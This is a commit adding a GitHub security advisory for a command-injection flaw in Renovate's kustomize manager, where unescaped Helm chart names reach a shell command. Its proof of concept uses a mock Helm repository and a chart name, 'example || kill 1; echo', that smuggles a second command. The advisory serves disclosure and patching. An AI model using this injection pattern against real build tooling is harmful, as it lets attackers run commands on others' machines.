Publish GHSA-xv56-3wq5-9997

advisory-database[bot] · advisory-database[bot] · commit 278e63d49aac · 2026-01-13T19:58:34.000Z
diff --git a/advisories/github-reviewed/2026/01/GHSA-xv56-3wq5-9997/GHSA-xv56-3wq5-9997.json b/advisories/github-reviewed/2026/01/GHSA-xv56-3wq5-9997/GHSA-xv56-3wq5-9997.json
@@ -0,0 +1,55 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-xv56-3wq5-9997",
+  "modified": "2026-01-13T19:57:06Z",
+  "published": "2026-01-13T19:57:06Z",
+  "aliases": [],
+  "summary": "Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository",
+  "details": "### Summary\nThe user-provided chart name in the `kustomize` manager is appended to the `helm pull --untar` command without proper sanitization.\n\n### Details\nAdversaries can provide a maliciously crafted `kustomization.yaml` in conjunction with a Helm repo's `index.yaml` file to trick Renovate to execute arbitrary code.\nThe value for the `depName` argument for the `helmRepositoryArgs` function in [lib/modules/manager/kustomize/artifacts.ts](https://github.com/renovatebot/renovate/blob/cc08c6e98f19e6258c5d3180c70c98e1be0b0d37/lib/modules/manager/kustomize/artifacts.ts#L33) is not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization has been present in the product since version 39.218.9 (https://github.com/renovatebot/renovate/commit/cc08c6e98f19e6258c5d3180c70c98e1be0b0d37), released on March 26 of 2025.\n\n### PoC\n1. Create a mock Helm repository. Have its `index.yaml` endpoint return:\n```yaml\napiVersion: v1\nentries:\n  \"example || kill 1; echo\":\n    - version: 1.0.1\n      created: 2016-10-06T16:23:20.499814565-06:00\n    - version: 1.0.0\n      created: 2016-10-06T16:23:20.499543808-06:00\n```\n\n2. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n  $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n  postUpdateOptions: [\n    \"kustomizeInflateHelmCharts\",\n  ]\n}\n```\n\n`kustomization.yaml`:\n\n```yaml\nkind: Kustomization\napiVersion: kustomize.config.k8s.io/v1beta1\nhelmCharts:\n  - name: \"example || kill 1; echo\"\n    repo: TODO reference the mocked Helm repository over https\n    version: 1.0.0\n```\nwith the todo resolved\n\n`charts/.gitkeep`:\n\n(empty)\n\n3. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n### Impact\nThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "renovate"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "39.218.0"
+            },
+            {
+              "fixed": "40.33.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-xv56-3wq5-9997"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/renovatebot/renovate"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-77"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-01-13T19:57:06Z",
+    "nvd_published_at": null
+  }
+}
